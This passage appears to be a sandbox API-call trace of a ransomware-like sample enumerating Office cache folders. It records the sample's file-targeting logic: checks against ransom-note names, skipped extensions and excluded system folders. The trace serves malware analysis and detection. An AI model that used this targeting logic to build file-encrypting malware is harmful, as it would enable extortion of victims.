(lpString1="Proofing.msi", lpString2=".") returned 1 [0107.586] lstrcmpW (lpString1="Proofing.msi", lpString2="..") returned 1 [0107.586] lstrcmpiW (lpString1="Proofing.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.586] lstrcmpiW (lpString1="Proofing.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.586] PathFindExtensionW (pszPath="Proofing.msi") returned=".msi" [0107.586] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.586] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.586] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.586] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.586] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.586] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0107.586] lstrcmpW (lpString1="Proofing.xml", lpString2=".") returned 1 [0107.586] lstrcmpW (lpString1="Proofing.xml", lpString2="..") returned 1 [0107.586] lstrcmpiW (lpString1="Proofing.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.587] lstrcmpiW (lpString1="Proofing.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.587] PathFindExtensionW (pszPath="Proofing.xml") returned=".xml" [0107.587] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.587] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.587] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.587] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.587] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.587] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.587] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.587] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0107.587] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0107.587] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0107.587] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.587] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.587] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0107.587] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.587] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.588] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.588] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.588] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.588] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.588] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.588] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a4028 [0107.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.588] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0107.588] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0107.588] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0107.588] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0107.588] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0107.588] lstrlenW (lpString="{90140000-0043-0409-1000-0000000FF1CE}-C") returned 40 [0107.588] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-0043-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C" [0107.588] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.588] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0107.589] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.590] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0107.590] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" [0107.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\") returned 63 [0107.590] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0107.594] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.594] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.601] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.601] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.601] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0107.601] lstrcmpW (lpString1="Office32MUI.msi", lpString2=".") returned 1 [0107.601] lstrcmpW (lpString1="Office32MUI.msi", lpString2="..") returned 1 [0107.601] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.601] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.602] PathFindExtensionW (pszPath="Office32MUI.msi") returned=".msi" [0107.602] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.602] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.602] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.602] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.602] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.602] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0107.602] lstrcmpW (lpString1="Office32MUI.xml", lpString2=".") returned 1 [0107.602] lstrcmpW (lpString1="Office32MUI.xml", lpString2="..") returned 1 [0107.602] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.602] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.602] PathFindExtensionW (pszPath="Office32MUI.xml") returned=".xml" [0107.602] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.602] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.602] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.602] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.602] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a40d0 [0107.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.602] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0107.602] lstrcmpW (lpString1="OWOW32LR.cab", lpString2=".") returned 1 [0107.603] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="..") returned 1 [0107.603] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.603] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.603] PathFindExtensionW (pszPath="OWOW32LR.cab") returned=".cab" [0107.603] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.603] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.603] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.603] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.603] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.603] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a4178 [0107.603] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.603] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0107.603] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0107.603] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0107.603] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.603] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.603] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0107.603] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.603] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.603] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.604] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.604] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.604] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.604] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.604] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.604] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a4220 [0107.604] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.604] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0107.604] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0107.605] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0107.605] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0107.605] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0107.605] lstrlenW (lpString="{90140000-0044-0409-1000-0000000FF1CE}-C") returned 40 [0107.605] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-0044-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C" [0107.605] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.605] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.605] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.605] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.606] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0107.606] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" [0107.606] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\") returned 63 [0107.606] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0107.609] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.609] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.609] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.609] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.609] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0107.609] lstrcmpW (lpString1="InfLR.cab", lpString2=".") returned 1 [0107.609] lstrcmpW (lpString1="InfLR.cab", lpString2="..") returned 1 [0107.609] lstrcmpiW (lpString1="InfLR.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.609] lstrcmpiW (lpString1="InfLR.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.609] PathFindExtensionW (pszPath="InfLR.cab") returned=".cab" [0107.609] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.609] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.609] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.609] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.609] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.609] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a42c8 [0107.609] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0107.609] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2=".") returned 1 [0107.610] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="..") returned 1 